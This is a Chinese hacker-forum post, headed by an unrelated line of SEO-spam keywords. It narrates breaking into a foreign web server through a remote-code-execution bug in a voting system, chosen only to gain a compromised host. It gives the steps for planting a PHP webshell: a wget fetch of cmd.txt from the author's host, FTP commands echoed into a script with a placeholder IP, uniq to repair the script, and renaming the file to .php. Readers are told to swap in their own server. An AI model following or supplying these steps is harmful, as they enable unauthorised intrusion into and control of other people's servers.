网站城市跳转怎么做,免费软件你懂我意思正能量,店铺推广软文,网站云主机吗首先俺先声明俺是个菜鸟#xff0c;俺虽然是菜鸟但俺不会一直是菜鸟的(一旁兄弟喊到#xff1a;别俺#xff0c;俺#xff0c;俺的#xff0c;说普通话#xff01;)。俺#xff0c;不对#xff0c;我一直遵照着实践是检验真理的唯一标准这句话学习技术#xff0c;这不…首先俺先声明俺是个菜鸟俺虽然是菜鸟但俺不会一直是菜鸟的(一旁兄弟喊到别俺俺俺的说普通话)。俺不对我一直遵照着实践是检验真理的唯一标准这句话学习技术这不刚刚实践了一次有了一点小小的心得拿出来和大家分享一下)简单介绍一下背景吧(旁白我kao你写小说呢)我一直想拿一个TK国的肉鸡(没有仇啊只是从来没拿过想要)于是google了一个然后一阵狂扫(哎固有思路的错)废了半天劲结果是没戏正准备走的时候发现了它用的一个投票系统于是满大街找终于找到了下载地址。dwon下来后开始阅读代码(当时很激动第一次尝试漏洞发掘)结果居然被我找到了一个远程代码执行的漏洞乎乎赶紧试了一下成功看样子我要发财了。于是看了看safe_modeOFF嘿嘿~~可以执行shell命令。下面的思路很显然了就是拿webshell。原来在win中碰到mssql可以执行命令的情况最简单的办法就是用echo写入一句话后门于是赶紧找来php的一句话后门结果一看傻了眼。linux shell中,1。使用单引号将要转义的字符包含起来2。在需要转义的字符前加上“\”符号。正要兴冲冲地修改一句话后门才想起来还没看看目标机器的magic_quotes_gpc是怎么设置的。一想到这心里凉了一大节一般都是ON的啊。实践检验真理果然被我言中了。因为它一ON所有的单引号还有空字符以及“\”等字符前面又被加上了一个“\”。我的一句后门被改的面目全非还执行个P啊-(一条路断了接着找另一条。想到wget下载的方法这个以前看过很多前辈用过于是先看看wget存不存在如图(图中我是为了方便自己写的一个exp。)800) window.open(/Article/UploadPic/2007-2/2007210454786.jpg); src/Article/UploadPic/2007-2/2007210454786.jpg οnlοadif(this.width800)this.width800;if(this.height800)this.height800; border0看样子是存在的。于是把一个执行cmd功能的php文件cmd.php改成cmd.txt上传到自己的web空间(记得要改后缀啊因为直接请求一个php文件返回的结果是解析过的肯定不对的了)在exp环境中输入wget http//www.myhost.com/cmd.txt。结果等了半天却是失败了(后来我又google了几个有漏洞的站只有一个使用wget下载成功的。其它的都失败了-()一条路又没了哎~~~接着想吧突然想起来原来在win下使用ftp命令上传webshell的方法于是回忆了一下过程1。使用echo命令把ftp指令echo到一个文本文件里2。使用 ftp的-s选项制订这个文本文件这样下载的整个过程都不需要人工干预了。好说干就干需要echo的内容如下echo open 111.111.111.111 temp.txtecho username temp.txtecho passwd temp.txtecho get cmd.txt temp.txtecho bye temp.txt上面的ip和用户名和密码都是假的你问我为什么(我kao我怕哪为大哥把我的ftp给做了-)实际用的时候换成你自己的就行了好开始在exp环境下echo一会的功夫就echo完了。确保正确我们在cat一下看看吧cat ./temp.txt这一cat不要紧我又惊了一次里面的每一行都被重复了一次如图(这个是我事后为了写这个文章重新做的所以忘了在最前面echo open 111.111.111.111了大家知道就行-)800) window.open(http://forum.eviloctal.com/attachment/Mon_0701/10_72248_1be50d4c79fba15.jpg); srchttp://forum.eviloctal.com/attachment/Mon_0701/10_72248_1be50d4c79fba15.jpg οnlοadif(this.width800)this.width800;if(this.height800)this.height800; border0面对这个问题再次我让我想到在winmssql情况下也碰到这样的问题原因是由于对数据库多次查询造成的结果。当时的解决办法有很多常用的有1。如果写入的是一句话后门可以直接echo进去使用“”而不是“”。2。写入hget.vbs用来下载指定的文件。这个时候可以才用“”符号把各行代码连接起来一次性写入。3。或者是用echo把每行代码都echo到一个不同的文件然后再用copy命令把这些文件的内容连接起来生成新的文件。还有其它的方法我就不多说了但很明显这些方法用在我这里是肯定不行的了因为我查了一下cp命令好像不支持“”连接符。难道没办法了吗NO方法是人想出来的于是乎我查来查去还真让我找到了一个宝贝uniq命令这个是linux shell下的自带程序功能很单一但恰恰是我们需要的——去除重复行。我再kao一次thank god命令帮助如下QUOTE:$ uniq --helpUsage: uniq [OPTION]... [INPUT [OUTPUT]]Discard all but one of successive identical lines from INPUT (orstandard input), writing to OUTPUT (or standard output).Mandatory arguments to long options are mandatory for short options too.-c, --count prefix lines by the number of occurrences-d, --repeated only print duplicate lines-D, --all-repeated[delimit-method] print all duplicate linesdelimit-method{none(default),prepend,separate}Delimiting is done with blank lines.-f, --skip-fieldsN avoid comparing the first N fields-i, --ignore-case ignore differences in case when comparing-s, --skip-charsN avoid comparing the first N characters-u, --unique only print unique lines-w, --check-charsN compare no more than N characters in lines--help display this help and exit--version output version information and exitA field is a run of whitespace, then non-whitespace characters.Fields are skipped before chars.Report bugs to .常搞黑的应该能认出大多数单词了我就不多做介绍了。反正用在我这里就这么简单一句命令就可以搞定uniq temp.txt down.txt,如图800) window.open(http://forum.eviloctal.com/attachment/Mon_0701/10_72248_9188d83bdf39436.jpg); srchttp://forum.eviloctal.com/attachment/Mon_0701/10_72248_9188d83bdf39436.jpg οnlοadif(this.width800)this.width800;if(this.height800)this.height800; border0哈哈成了吧下面用法就很简单了在exp的提示符下输入ftp 下面的工作就好办了使用mv改个名字就行了mv ./cmd.txt ./cmd.php到这里就结束了我原来在交流版块发过一个求助的帖子除了几个兄弟回帖外便没有什么价值的东西了。我也是菜鸟和大多数菜鸟都有一个很不好的习惯不懂就问。哎~~~其实有些东西不是咱们比老鸟差而是我们太懒太不知道总结了所以我们应该是不懂就学而不是不懂就问这样我们才会从菜鸟变成老鸟才能进步上面乃是自己的经验总结看上去很简单可是却耗费了我不少精力所以如果您不喜欢请不要打击我回个帖鼓励鼓励我我会很感激的。谢谢
